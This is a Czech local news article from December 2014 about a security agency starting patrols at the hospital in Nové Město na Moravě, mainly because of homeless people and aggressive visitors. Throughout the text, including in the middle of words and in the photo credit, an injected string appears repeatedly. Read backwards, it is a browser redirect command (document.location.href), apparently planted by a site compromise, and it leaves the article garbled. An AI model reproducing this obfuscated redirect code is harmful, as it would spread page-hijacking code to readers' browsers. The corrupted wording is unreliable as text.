bezpečnostní agentura
Rainbow page separator

Nemocnici začala střežit bezpečnostní agentura

Středa, 24. prosince 2014

Nemocnice Nové Město na Moravě

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Především problémy s bezdomovci, kteří se v nadcházejícím zimním období stahují do areálu novoměstské nemocnice, mají řešit pracovníci žďárské bezpečnostní agentury RASYGUARD. Ostraha začala ve zdravotnickém zařízení působit od poloviny prosince.
„Postupně se objevovalo stále více problémů. Nebyly [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to sice nějaké závažné případy, ale jde o komfort a bezpečí ostatních pacientů a personálu hlavně ve večerních a nočních hodinách,“ informoval mluvčí novoměstské nemocnice Roman Kra[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tochvíl. Přesné termíny pochůzek ochranky v novoměstské nemocnici nejsou určeny, aby [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toho nemohly problematické osoby využívat. „V případě konfliktu nebo problému v době, kdy hlídka není v areálu, přijedou pracovníci bezpečnostní agentury na telefonické zavolání,“ dodal mluvčí Kra[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tochvíl. V případě potřeby mohou zasáhnout rovněž při ohrožení personálu nemocnice agresivními osobami, již bývají nezřídka pod vlivem alkoholu nebo drog.

Fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to: [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to.com/“ target=“_blank“>www.dajc-naturepho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to.com